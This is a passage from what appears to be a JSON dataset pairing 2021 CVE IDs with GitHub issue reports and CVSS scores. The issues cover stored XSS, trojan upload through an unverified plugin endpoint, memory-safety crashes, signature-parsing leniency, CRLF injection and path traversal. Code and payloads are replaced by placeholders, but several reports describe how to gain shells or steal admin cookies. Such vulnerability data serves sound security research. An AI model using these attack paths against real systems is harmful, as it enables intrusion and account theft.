  65996. "description": "Hi I found two loopholes.. Hi I found two loopholes. In version NUMBERTAG The first one: The location where the plug in is uploaded in the background without any security verification. You can upload Trojan files to obtain system permissions. The second one: the storage type xss exists in the place where the article is written. Next are the details of the exploit: The first vulnerability: Because the backend login location does not have a verification code and no lock policy is set, if an attacker enters the backend through brute force cracking, the attacker can upload the php Trojan file, because the file path after saving is regular , So the attacker can connect to the Trojan horse file through a hacker tool to obtain system permissions. FILETAG Access to Trojan files to verify that the vulnerability exists. FILETAG Hacking tools connect to Trojan files to obtain system permissions. FILETAG The second vulnerability: If a low privilege user uses the vulnerability to write malicious code and publish it, all people who view this article will be attacked. He can obtain the administrator\u2019s cookie information, and the administrator\u2019s cookie can be used directly by the administrator. Log in to the background system with permission. You can also continue to exploit the first vulnerability after logging in. FILETAG The administrator's access to the article triggers a pop up window to verify that the vulnerability exists. FILETAG The attacker obtains the administrator cookie. FILETAG Repair suggestions: The first vulnerability: verify the format of the uploaded file, verify the content of the file, and set the uploaded file name to random. The second vulnerability: html entity conversion or filtering of sensitive words input by the user, such as <, >,', \", script.",
  65997. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  65998. "severity": "MEDIUM",
  65999. "baseScore": 6.5,
  66000. "impactScore": 3.6,
  66001. "exploitabilityScore": 2.8
  66002. },
  66003. {
  66004. "CVE_ID": "CVE-2021-30218",
  66005. "Issue_Url_old": "https://github.com/michaelforney/samurai/issues/67",
  66006. "Issue_Url_new": "https://github.com/michaelforney/samurai/issues/67",
  66007. "Repo_new": "michaelforney/samurai",
  66008. "Issue_Created_At": "2021-04-02T17:48:35Z",
  66009. "description": "NULL pointer dereference in the APITAG function. Hi, While fuzzing samurai NUMBERTAG and git nightly repo), I found a NULL pointer dereference in the APITAG function, in util.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  66010. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66011. "severity": "MEDIUM",
  66012. "baseScore": 5.5,
  66013. "impactScore": 3.6,
  66014. "exploitabilityScore": 1.8
  66015. },
  66016. {
  66017. "CVE_ID": "CVE-2021-30219",
  66018. "Issue_Url_old": "https://github.com/michaelforney/samurai/issues/68",
  66019. "Issue_Url_new": "https://github.com/michaelforney/samurai/issues/68",
  66020. "Repo_new": "michaelforney/samurai",
  66021. "Issue_Created_At": "2021-04-02T17:58:51Z",
  66022. "description": "NULL pointer dereference in the APITAG function. Hi, While fuzzing samurai NUMBERTAG and git nightly repo), I found a NULL pointer dereference in the APITAG function, in build.c. CODETAG In the code snippet, it seems there are no checks on cmd parameter which leads to set the variable description to NULL on L NUMBERTAG and then on L NUMBERTAG it dereferences the NULL Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  66023. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66024. "severity": "MEDIUM",
  66025. "baseScore": 5.5,
  66026. "impactScore": 3.6,
  66027. "exploitabilityScore": 1.8
  66028. },
  66029. {
  66030. "CVE_ID": "CVE-2021-30227",
  66031. "Issue_Url_old": "https://github.com/emlog/emlog/issues/79",
  66032. "Issue_Url_new": "https://github.com/emlog/emlog/issues/79",
  66033. "Repo_new": "emlog/emlog",
  66034. "Issue_Created_At": "2021-04-05T09:06:50Z",
  66035. "description": "emlog NUMBERTAG has XSS Vulnerability . \u5728\u6587\u7ae0\u8bc4\u8bba\u5904\u63d0\u4ea4\u8bc4\u8bba FILETAG \u7136\u540e\u5728\u540e\u53f0\u67e5\u770b\u8bc4\u8bba\uff0c\u70b9\u51fb FILETAG",
  66036. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  66037. "severity": "MEDIUM",
  66038. "baseScore": 6.1,
  66039. "impactScore": 2.7,
  66040. "exploitabilityScore": 2.8
  66041. },
  66042. {
  66043. "CVE_ID": "CVE-2021-30246",
  66044. "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/478",
  66045. "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/478",
  66046. "Repo_new": "kjur/jsrsasign",
  66047. "Issue_Created_At": "2021-04-02T05:31:06Z",
  66048. "description": "Leniency in parsing block type byte and padding bytes for PKCS NUMBERTAG signature verification. Another finding besides the incompatibility issue reported here URLTAG for PKCS NUMBERTAG signature verification, is the leniency in parsing the prefix of PKCS NUMBERTAG structure. Background. The prefix to the top ASN NUMBERTAG structure of the PKCS NUMBERTAG encoded message consists of leading byte ( APITAG ), block type byte ( APITAG for RSA signing scheme), padding bytes ( APITAG ), and the end of padding ( APITAG ). The length of padding bytes should also be at least NUMBERTAG bytes and computed such that the final length of the PKCS NUMBERTAG encoded message is equal to the length of public modolous N (denoted by APITAG ). Block type byte is there to indicate to which RSA scheme this encoded message is belonged. The end of padding also specifies where padding bytes actually ends. The leading byte ( APITAG ) also guarantees that the integer representative of the encoded message is not greater than or equal to the public modolous N . By and large, the prefix bytes should satisfy the requirements in order for RSA PKS NUMBERTAG signature scheme to be able to hold on to its security promises. Problem. However, jsrsasign APITAG is lenient in checking such requirements and some other invalid signatures are mistakenly recognized to be valid. As will be shown below in the snippet taken from the source code, the issue arises because the implementation ignores the initial APITAG bytes as they will disappear in octet strings to integer translation and more importantly the fact that an incorrect regex pattern matching is being used to peel off the prefix from the the top ASN NUMBERTAG structure. This bug seems to be of similar type previously reported on RSA PSS signature validation URLTAG . More detailed root cause analysis. In line APITAG @ APITAG function in APITAG file, the initial APITAG bytes will be ignored when octet strings are converted to integer ( APITAG ) and converted back to octet strings after taking modular exponentiation to the power public exponent ( APITAG and APITAG ). The regex being used in APITAG to remove the prefix only checks for the initial string APITAG . So, it does not actually check for the padding bytes ( APITAG ) and can be bypassed by long initial zeros (examples are given). ERRORTAG Implication: APITAG issue) As this might not be susceptible to an immediate signature forgery attack because without the ability to hide random bytes, the attack cost seems to be prohibitive. However, this can simply create an interoperability issue. Reference notation and concrete values N : public modulus APITAG : length of public modulus d : private exponent e : public exponent H : hash function m : message I : to be singed RSA PKCS NUMBERTAG signature scheme input structure S : signature value obtained by APITAG CODETAG Example NUMBERTAG Padding bytes with length NUMBERTAG APITAG CODETAG Example NUMBERTAG All zero bytes as prefix CODETAG CODETAG Example NUMBERTAG It can start with some number of APITAG bytes, and then APITAG byte followed by some APITAG bytes ending with APITAG byte. CODETAG CODETAG",
  66049. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  66050. "severity": "CRITICAL",
  66051. "baseScore": 9.1,
  66052. "impactScore": 5.2,
  66053. "exploitabilityScore": 3.9
  66054. },
  66055. {
  66056. "CVE_ID": "CVE-2021-30476",
  66057. "Issue_Url_old": "https://github.com/hashicorp/terraform-provider-vault/issues/996",
  66058. "Issue_Url_new": "https://github.com/hashicorp/terraform-provider-vault/issues/996",
  66059. "Repo_new": "hashicorp/terraform-provider-vault",
  66060. "Issue_Created_At": "2021-03-12T18:05:11Z",
  66061. "description": "vault_gcp_auth_backend_role does not apply bound_labels. The APITAG resource does not apply bound_labels URLTAG to the vault auth method. Earlier this week while debugging an issue I tried to authenticate to my vault from a VM that did not have the the APITAG that I had defined in my terraform configuration... To my surprise my authentication was successful, this led me down the route of finding out why terraform was lying to me. Terraform Version APITAG Affected Resource(s) vault_gcp_auth_backend_role Terraform Configuration Files CODETAG Expected Behavior Terraform should apply the security controls that it says it does for the vault provider. Actual Behavior Terraform does not install the APITAG configuration to the APITAG resource. Steps to Reproduce CODETAG",
  66062. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66063. "severity": "CRITICAL",
  66064. "baseScore": 9.8,
  66065. "impactScore": 5.9,
  66066. "exploitabilityScore": 3.9
  66067. },
  66068. {
  66069. "CVE_ID": "CVE-2021-30498",
  66070. "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/53",
  66071. "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/53",
  66072. "Repo_new": "cacalabs/libcaca",
  66073. "Issue_Created_At": "2021-04-07T02:31:14Z",
  66074. "description": "[ Security] heap buffer overflow of export.c in function export_tga. Hi libcaca Team When I use the libfuzz test library API, I found an overflow error. Here are the steps to reproduce and my running environment System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Fedora NUMBERTAG clang NUMBERTAG gcc NUMBERTAG erification steps\uff1a APITAG the source code of libcaca APITAG the libcaca.so library APITAG or CODETAG APITAG the poc_tga.cc && build ERRORTAG NUMBERTAG compile poc_tga.cc APITAG APITAG poc_tga asan info: ERRORTAG",
  66075. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66076. "severity": "HIGH",
  66077. "baseScore": 7.8,
  66078. "impactScore": 5.9,
  66079. "exploitabilityScore": 1.8
  66080. },
  66081. {
  66082. "CVE_ID": "CVE-2021-30499",
  66083. "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/54",
  66084. "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/54",
  66085. "Repo_new": "cacalabs/libcaca",
  66086. "Issue_Created_At": "2021-04-07T02:36:51Z",
  66087. "description": "APITAG global buffer overflow of export.c in function export_troff. Hi libcaca Team When I use the libfuzz test library API, I found an overflow error. Here are the steps to reproduce and my running environment System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Fedora NUMBERTAG clang NUMBERTAG gcc NUMBERTAG libcaca version APITAG Verification steps\uff1a APITAG the source code of libcaca APITAG the libcaca.so library APITAG or CODETAG APITAG the poc_troff.cc && build ERRORTAG NUMBERTAG compile poc_troff.cc CODETAG APITAG poc_troff asan info: ERRORTAG",
  66088. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66089. "severity": "HIGH",
  66090. "baseScore": 7.8,
  66091. "impactScore": 5.9,
  66092. "exploitabilityScore": 1.8
  66093. },
  66094. {
  66095. "CVE_ID": "CVE-2021-30500",
  66096. "Issue_Url_old": "https://github.com/upx/upx/issues/485",
  66097. "Issue_Url_new": "https://github.com/upx/upx/issues/485",
  66098. "Repo_new": "upx/upx",
  66099. "Issue_Created_At": "2021-04-07T02:45:58Z",
  66100. "description": "Null pointer dereference in function APITAG APITAG What's the problem (or question)? Null pointer dereference was discovered in upx in the latest commit of the devel branch. FILETAG Please tell us details about your environment. UPX version used ( APITAG ): CODETAG Host Operating System and version: OS: Ubuntu NUMBERTAG LTS NUMBERTAG Host CPU architecture: CPU: Intel i NUMBERTAG GHz Target Operating System and version: same as Host Target CPU architecture: same as Host",
  66101. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66102. "severity": "HIGH",
  66103. "baseScore": 7.8,
  66104. "impactScore": 5.9,
  66105. "exploitabilityScore": 1.8
  66106. },
  66107. {
  66108. "CVE_ID": "CVE-2021-30501",
  66109. "Issue_Url_old": "https://github.com/upx/upx/issues/486",
  66110. "Issue_Url_new": "https://github.com/upx/upx/issues/486",
  66111. "Repo_new": "upx/upx",
  66112. "Issue_Created_At": "2021-04-07T07:13:11Z",
  66113. "description": "APITAG assertions again in function APITAG APITAG What's the problem (or question)? Same problem like issue NUMBERTAG URLTAG but not fix all the bug position. APITAG is attempted to be allocated with NUMBERTAG bytes, failing an assertion in APITAG asan CODETAG gdb ERRORTAG What should have happened? No failed assertions. Do you have an idea for a solution? Either remove the assertion (probably easier), or add logic to check that allocations are NUMBERTAG bytes. or like the c NUMBERTAG b NUMBERTAG URLTAG add some sanitize code. How can we reproduce the issue? APITAG UPX APITAG NUMBERTAG Run APITAG zipped poc : FILETAG Please tell us details about your environment. UPX version used ( APITAG ): CODETAG Host Operating System and version: APITAG Host CPU architecture: APITAG Target Operating System and version: same as Host Target CPU architecture: same as Host",
  66114. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66115. "severity": "MEDIUM",
  66116. "baseScore": 5.5,
  66117. "impactScore": 3.6,
  66118. "exploitabilityScore": 1.8
  66119. },
  66120. {
  66121. "CVE_ID": "CVE-2021-30637",
  66122. "Issue_Url_old": "https://github.com/danpros/htmly/issues/456",
  66123. "Issue_Url_new": "https://github.com/danpros/htmly/issues/456",
  66124. "Repo_new": "danpros/htmly",
  66125. "Issue_Created_At": "2021-04-13T03:26:18Z",
  66126. "description": "The code has stored XSS vulnerabilities. The XSS filtering of blog title, Tagline, and Description in FILETAG is not rigorous, resulting in the generation of stored XSS FILETAG FILETAG Front display FILETAG",
  66127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66128. "severity": "MEDIUM",
  66129. "baseScore": 5.4,
  66130. "impactScore": 2.7,
  66131. "exploitabilityScore": 2.3
  66132. },
  66133. {
  66134. "CVE_ID": "CVE-2021-31162",
  66135. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/83618",
  66136. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/83618",
  66137. "Repo_new": "rust-lang/rust",
  66138. "Issue_Created_At": "2021-03-28T20:48:16Z",
  66139. "description": "Double free in Vec::from_iter specialization when drop panics. URLTAG URLTAG APITAG calls APITAG . APITAG calls APITAG before overwriting the pointer. As a result, dropped elements are not invalidated and dropped again under panic. APITAG ERRORTAG Output: CODETAG Tested with APITAG . Here is a playground link URLTAG to the code snippet.",
  66140. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66141. "severity": "CRITICAL",
  66142. "baseScore": 9.8,
  66143. "impactScore": 5.9,
  66144. "exploitabilityScore": 3.9
  66145. },
  66146. {
  66147. "CVE_ID": "CVE-2021-31254",
  66148. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1703",
  66149. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1703",
  66150. "Repo_new": "gpac/gpac",
  66151. "Issue_Created_At": "2021-03-11T08:32:34Z",
  66152. "description": "FILETAG",
  66153. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66154. "severity": "HIGH",
  66155. "baseScore": 7.8,
  66156. "impactScore": 5.9,
  66157. "exploitabilityScore": 1.8
  66158. },
  66159. {
  66160. "CVE_ID": "CVE-2021-31255",
  66161. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1733",
  66162. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1733",
  66163. "Repo_new": "gpac/gpac",
  66164. "Issue_Created_At": "2021-04-08T04:06:31Z",
  66165. "description": "FILETAG",
  66166. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66167. "severity": "HIGH",
  66168. "baseScore": 7.8,
  66169. "impactScore": 5.9,
  66170. "exploitabilityScore": 1.8
  66171. },
  66172. {
  66173. "CVE_ID": "CVE-2021-31256",
  66174. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1705",
  66175. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1705",
  66176. "Repo_new": "gpac/gpac",
  66177. "Issue_Created_At": "2021-03-12T02:25:29Z",
  66178. "description": "FILETAG",
  66179. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  66180. "severity": "MEDIUM",
  66181. "baseScore": 5.5,
  66182. "impactScore": 3.6,
  66183. "exploitabilityScore": 1.8
  66184. },
  66185. {
  66186. "CVE_ID": "CVE-2021-31257",
  66187. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1734",
  66188. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1734",
  66189. "Repo_new": "gpac/gpac",
  66190. "Issue_Created_At": "2021-04-08T04:07:59Z",
  66191. "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66192. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66193. "severity": "MEDIUM",
  66194. "baseScore": 5.5,
  66195. "impactScore": 3.6,
  66196. "exploitabilityScore": 1.8
  66197. },
  66198. {
  66199. "CVE_ID": "CVE-2021-31258",
  66200. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1706",
  66201. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1706",
  66202. "Repo_new": "gpac/gpac",
  66203. "Issue_Created_At": "2021-03-12T06:50:09Z",
  66204. "description": "null dereference issue with APITAG Hi, There is a null dereference issue with APITAG can reproduce on the lattest commit aka APITAG Steps to reproduce build with asan: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66205. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66206. "severity": "MEDIUM",
  66207. "baseScore": 5.5,
  66208. "impactScore": 3.6,
  66209. "exploitabilityScore": 1.8
  66210. },
  66211. {
  66212. "CVE_ID": "CVE-2021-31259",
  66213. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1735",
  66214. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1735",
  66215. "Repo_new": "gpac/gpac",
  66216. "Issue_Created_At": "2021-04-08T07:10:40Z",
  66217. "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66218. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66219. "severity": "MEDIUM",
  66220. "baseScore": 5.5,
  66221. "impactScore": 3.6,
  66222. "exploitabilityScore": 1.8
  66223. },
  66224. {
  66225. "CVE_ID": "CVE-2021-31260",
  66226. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1736",
  66227. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1736",
  66228. "Repo_new": "gpac/gpac",
  66229. "Issue_Created_At": "2021-04-08T07:11:57Z",
  66230. "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66231. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66232. "severity": "MEDIUM",
  66233. "baseScore": 5.5,
  66234. "impactScore": 3.6,
  66235. "exploitabilityScore": 1.8
  66236. },
  66237. {
  66238. "CVE_ID": "CVE-2021-31261",
  66239. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1737",
  66240. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1737",
  66241. "Repo_new": "gpac/gpac",
  66242. "Issue_Created_At": "2021-04-09T00:56:24Z",
  66243. "description": "FILETAG",
  66244. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  66245. "severity": "MEDIUM",
  66246. "baseScore": 5.5,
  66247. "impactScore": 3.6,
  66248. "exploitabilityScore": 1.8
  66249. },
  66250. {
  66251. "CVE_ID": "CVE-2021-31262",
  66252. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1738",
  66253. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1738",
  66254. "Repo_new": "gpac/gpac",
  66255. "Issue_Created_At": "2021-04-09T00:57:41Z",
  66256. "description": "null dereference in APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66257. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66258. "severity": "MEDIUM",
  66259. "baseScore": 5.5,
  66260. "impactScore": 3.6,
  66261. "exploitabilityScore": 1.8
  66262. },
  66263. {
  66264. "CVE_ID": "CVE-2021-31272",
  66265. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/3991",
  66266. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/3991",
  66267. "Repo_new": "serenityos/serenity",
  66268. "Issue_Created_At": "2020-11-08T04:03:18Z",
  66269. "description": "tar: Directory traversal vulnerability may lead to privilege escalation. APITAG FILETAG Most of the file system is mounted read only. However, we can overwrite APITAG to gain privileges next time root uses APITAG .",
  66270. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66271. "severity": "CRITICAL",
  66272. "baseScore": 9.8,
  66273. "impactScore": 5.9,
  66274. "exploitabilityScore": 3.9
  66275. },
  66276. {
  66277. "CVE_ID": "CVE-2021-31272",
  66278. "Issue_Url_old": "https://github.com/SerenityOS/serenity/issues/3992",
  66279. "Issue_Url_new": "https://github.com/serenityos/serenity/issues/3992",
  66280. "Repo_new": "serenityos/serenity",
  66281. "Issue_Created_At": "2020-11-08T04:20:52Z",
  66282. "description": "unzip: Directory traversal vulnerability may lead to command execution / privilege escalation. Same issue as NUMBERTAG in tar . FILETAG This could also be used to gain command execution on the host, or elevate privileges to the anon user from a lower privileged user, in the event that anon extracts a malicious tar file. Command execution via APITAG (as root ) or APITAG (as anon ).",
  66283. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66284. "severity": "CRITICAL",
  66285. "baseScore": 9.8,
  66286. "impactScore": 5.9,
  66287. "exploitabilityScore": 3.9
  66288. },
  66289. {
  66290. "CVE_ID": "CVE-2021-31327",
  66291. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/14",
  66292. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/14",
  66293. "Repo_new": "remoteclinic/remoteclinic",
  66294. "Issue_Created_At": "2021-04-14T10:01:09Z",
  66295. "description": "Stored XSS vulnerability in /medicines. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG Step to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG When you scroll down the main dashboard page, there is medicines options, Click APITAG Medicine\". FILETAG NUMBERTAG Here is a APITAG Name\" Field which is vulnerable to XSS. Inject XSS Payload: FILETAG FILETAG NUMBERTAG You can see there is client side validation on Medicine Name with maxlength is NUMBERTAG but not validate on server side. FILETAG NUMBERTAG Change maxlength to NUMBERTAG FILETAG NUMBERTAG Now Click on Register. FILETAG NUMBERTAG SS Executed on FILETAG FILETAG NUMBERTAG Now go to /medicines, Click on Show All. FILETAG NUMBERTAG SS Executed on /medicines. FILETAG",
  66296. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66297. "severity": "MEDIUM",
  66298. "baseScore": 5.4,
  66299. "impactScore": 2.7,
  66300. "exploitabilityScore": 2.3
  66301. },
  66302. {
  66303. "CVE_ID": "CVE-2021-31329",
  66304. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/16",
  66305. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/16",
  66306. "Repo_new": "remoteclinic/remoteclinic",
  66307. "Issue_Created_At": "2021-04-14T12:58:52Z",
  66308. "description": "Stored XSS vulnerability in FILETAG . Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Step to Reproduce NUMBERTAG Login in Application as Doctor NUMBERTAG Create New Staff Member. FILETAG NUMBERTAG Register as a Doctor. FILETAG NUMBERTAG Here is two fields APITAG and APITAG Address\" which is vulnerable to XSS, inject with XSS Payload: FILETAG FILETAG NUMBERTAG Now Click on Register. FILETAG NUMBERTAG Profile Created. FILETAG NUMBERTAG Now Signout. FILETAG NUMBERTAG Login with that Staff Member which you registered as a Doctor. FILETAG NUMBERTAG Now go to My Profile. FILETAG NUMBERTAG SS Executed. FILETAG",
  66309. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66310. "severity": "MEDIUM",
  66311. "baseScore": 5.4,
  66312. "impactScore": 2.7,
  66313. "exploitabilityScore": 2.3
  66314. },
  66315. {
  66316. "CVE_ID": "CVE-2021-31402",
  66317. "Issue_Url_old": "https://github.com/flutterchina/dio/issues/1130",
  66318. "Issue_Url_new": "https://github.com/cfug/dio/issues/1130",
  66319. "Repo_new": "cfug/dio",
  66320. "Issue_Created_At": "2021-04-15T08:40:27Z",
  66321. "description": "CRLF in APITAG sec issue. New Issue Checklist x] I have searched for a similar issue in the [project URLTAG and found none Issue Info ENV: Any Examples generated on: ERRORTAG Issue Description and Steps Please consider given snippet: CODETAG Generated call looks like CODETAG Which presents a security issue. Classic CRLF injection. Vector attack: If the attacker controls the HTTP method(verb), he can change a call and steal all cookies, session whatever is in a call. Assuming flow like USER > FOO > BAR , where flow between FOO and BAR is internal, mentioned data may leak. Let's assume I'm replacing example.com with my hackery uservice.org and the victim(service) is working in a company behind the proxy. This means I can easily redirect calls with headers/cookies(tokens) and blah blah blah. By doing more advanced CRLF I can remove the requirement for proxy at all. Expected behavior: if HTTP method(verb) is invalid, raise error.",
  66322. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66323. "severity": "HIGH",
  66324. "baseScore": 7.5,
  66325. "impactScore": 3.6,
  66326. "exploitabilityScore": 3.9
  66327. },
  66328. {
  66329. "CVE_ID": "CVE-2021-31402",
  66330. "Issue_Url_old": "https://github.com/cfug/dio/issues/1752",
  66331. "Issue_Url_new": "https://github.com/cfug/dio/issues/1752",
  66332. "Repo_new": "cfug/dio",
  66333. "Issue_Created_At": "2023-03-21T16:54:52Z",
  66334. "description": "CVE Dio NUMBERTAG Google OVS Scanner. Package dio Version NUMBERTAG Output of APITAG _No response_ Dart Version NUMBERTAG Steps to Reproduce Excute scanner in a flutter project with dio NUMBERTAG dependency. APITAG You can use Docker image from project URLTAG Expected Result Empty response from scanner. Actual Result CODETAG",
  66335. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66336. "severity": "HIGH",
  66337. "baseScore": 7.5,
  66338. "impactScore": 3.6,
  66339. "exploitabilityScore": 3.9
  66340. },
  66341. {
  66342. "CVE_ID": "CVE-2021-31407",
  66343. "Issue_Url_old": "https://github.com/vaadin/osgi/issues/50",
  66344. "Issue_Url_new": "https://github.com/vaadin/osgi/issues/50",
  66345. "Repo_new": "vaadin/osgi",
  66346. "Issue_Created_At": "2021-03-08T12:42:42Z",
  66347. "description": "Vaadin OSGi applications should not expose relevant classpath content as static resources. In our OSGi examples ( URLTAG & URLTAG class files and other resources can be accessed from the main bundles. This is unexpected behaviour from the end users point of view and can be considered a bad practise. We should either change the implementation of our integration code so that generic content from bundle(s) is not served or change the examples so that only minimal and security wise safe content is exposed.",
  66348. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  66349. "severity": "HIGH",
  66350. "baseScore": 7.5,
  66351. "impactScore": 3.6,
  66352. "exploitabilityScore": 3.9
  66353. },
  66354. {
  66355. "CVE_ID": "CVE-2021-31409",
  66356. "Issue_Url_old": "https://github.com/vaadin/framework/issues/12240",
  66357. "Issue_Url_new": "https://github.com/vaadin/framework/issues/12240",
  66358. "Repo_new": "vaadin/framework",
  66359. "Issue_Created_At": "2021-03-12T11:28:18Z",
  66360. "description": "Vaadin NUMBERTAG Compatibility Server APITAG catastrophic exponential time regular expression. The issue NUMBERTAG reported yesterday as fixed in NUMBERTAG has not been adressed in vaadin compatibility server, yet. See FILETAG Could you please port the fix and provide a Vaadin NUMBERTAG release with the appropriate Vaadin NUMBERTAG compatibility implementation? Thanks!",
  66361. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  66362. "severity": "HIGH",
  66363. "baseScore": 7.5,
  66364. "impactScore": 3.6,
  66365. "exploitabilityScore": 3.9
  66366. },
  66367. {
  66368. "CVE_ID": "CVE-2021-31525",
  66369. "Issue_Url_old": "https://github.com/golang/go/issues/45710",
  66370. "Issue_Url_new": "https://github.com/golang/go/issues/45710",
  66371. "Repo_new": "golang/go",
  66372. "Issue_Created_At": "2021-04-22T19:53:59Z",
  66373. "description": "http: APITAG can stack overflow. APITAG can stack overflow due to recursion when given a request with a very large header NUMBERTAG MB depending on the architecture). A APITAG which overrides the default max header of NUMBERTAG MB by setting APITAG to a much larger value could also be vulnerable in the same way. According to the new security policy NUMBERTAG this will be fixed as a PUBLIC track issue. Credit to Guido Vranken URLTAG who reported the crash as part of the Ethereum NUMBERTAG bounty program URLTAG . /cc APITAG",
  66374. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  66375. "severity": "MEDIUM",
  66376. "baseScore": 5.9,
  66377. "impactScore": 3.6,
  66378. "exploitabilityScore": 2.2
  66379. },
  66380. {
  66381. "CVE_ID": "CVE-2021-3163",
  66382. "Issue_Url_old": "https://github.com/quilljs/quill/issues/3273",
